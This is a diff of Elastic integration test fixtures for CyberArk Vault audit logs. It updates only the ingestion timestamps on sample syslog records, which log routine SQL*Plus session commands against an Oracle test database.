@@ -221,7 +221,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776968300Z", + "ingested": "2021-12-09T13:36:58.683108500Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=BEGIN DBMS_OUTPUT.DISABLE\\\\; END\\\\;;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=123B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=BEGIN DBMS_OUTPUT.DISABLE\\\\; 
END\\\\;;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=123B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -340,7 +340,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776971400Z", + "ingested": "2021-12-09T13:36:58.683112Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT ATTRIBUTE,SCOPE,NUMERIC_VALUE,CHAR_VALUE,DATE_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND (UPPER(USER) LIKE USERID);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=187B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" 
Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT 
ATTRIBUTE,SCOPE,NUMERIC_VALUE,CHAR_VALUE,DATE_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND (UPPER(USER) LIKE USERID);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=187B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -459,7 +459,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776973800Z", + "ingested": "2021-12-09T13:36:58.683116100Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT CHAR_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND ((UPPER(USER) LIKE USERID) OR (USERID \\\\= 'PUBLIC')) AND (UPPER(ATTRIBUTE) \\\\= 'ROLES');ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=380B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty 
Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=SELECT 
CHAR_VALUE FROM SYSTEM.PRODUCT_PRIVS WHERE (UPPER('SQL*Plus') LIKE UPPER(PRODUCT)) AND ((UPPER(USER) LIKE USERID) OR (USERID \\\\= 'PUBLIC')) AND (UPPER(ATTRIBUTE) \\\\= 'ROLES');ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=380B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -578,7 +578,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:33.776976100Z", + "ingested": "2021-12-09T13:36:58.683121400Z", "original": "\u003c5\u003e1 2021-03-25T14:56:44Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:44\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:44Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=BEGIN DBMS_APPLICATION_INFO.SET_MODULE(:1,NULL)\\\\; END\\\\; (Parameters bound by position: 1\\\\=[SQL*Plus]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=596B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n 
\u003cCAProperty Name=\\\"UserName\\\" Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 10:56:44\",\"IsoTimestamp\":\"2021-03-25T14:56:44Z\",\"Hostname\":\"VLT01\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"12.0.0000\",\"MessageID\":\"359\",\"Desc\":\"SQL Command\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"SQL Command\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"Oracle\",\"File\":\"Root\\\\Database-Oracle-oracle.cybr.com-HR\",\"Station\":\"10.0.0.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"Command=BEGIN DBMS_APPLICATION_INFO.SET_MODULE(:1,NULL)\\\\; END\\\\; (Parameters bound by 
position: 1\\\\=[SQL*Plus]);ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=596B;SrcHost=127.0.0.1;User=HR;VIDOffset=4T;\",\"Message\":\"SQL Command\",\"GatewayStation\":\"\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"Oracle\"},{\"Name\":\"UserName\",\"Value\":\"HR\"},{\"Name\":\"Address\",\"Value\":\"oracle.cybr.com\"},{\"Name\":\"Database\",\"Value\":\"XE\"},{\"Name\":\"DeviceType\",\"Value\":\"Database\"},{\"Name\":\"CPMStatus\",\"Value\":\"success\"},{\"Name\":\"RetriesCount\",\"Value\":\"-1\"},{\"Name\":\"LastTask\",\"Value\":\"VerifyTask\"},{\"Name\":\"LastSuccessVerification\",\"Value\":\"1616580248\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"Port\",\"Value\":\"1521\"},{\"Name\":\"LastSuccessChange\",\"Value\":\"1616011984\"},{\"Name\":\"Tags\",\"Value\":\"Oracle;DB\"},{\"Name\":\"Privcloud\",\"Value\":\"privcloud\"}]}}}}", "code": "359", "kind": "event", 
@@ -697,7 +697,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-06-09T10:24:33.776978400Z",
+ "ingested": "2021-12-09T13:36:58.683125200Z",
 "original": "\u003c5\u003e1 2021-03-25T14:56:45Z VLT01 {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 25 10:56:45\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-25T14:56:45Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVLT01\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e12.0.0000\u003c/Version\u003e\\n \u003cMessageID\u003e359\u003c/MessageID\u003e\\n \u003cDesc\u003eSQL Command\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eSQL Command\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003eOracle\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Database-Oracle-oracle.cybr.com-HR\u003c/File\u003e\\n \u003cStation\u003e10.0.0.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003eCommand=SELECT DECODE('A','A','1','2') FROM DUAL;ConnectionComponentId=PSM-SQLPlus;DataBase=XE;DstHost=oracle.cybr.com;Protocol=SQLNet;PSMID=PSMServer;SessionID=0887c643-42f2-4a4f-806e-58c1689de0e6;SQLOffset=727B;SrcHost=127.0.0.1;User=HR;VIDOffset=5T;\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSQL Command\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"Oracle\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" 
Value=\\\"HR\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"oracle.cybr.com\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Database\\\" Value=\\\"XE\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Database\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"success\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"-1\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"VerifyTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessVerification\\\" Value=\\\"1616580248\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Port\\\" Value=\\\"1521\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastSuccessChange\\\" Value=\\\"1616011984\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Tags\\\" Value=\\\"Oracle;DB\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Privcloud\\\" Value=\\\"privcloud\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 25 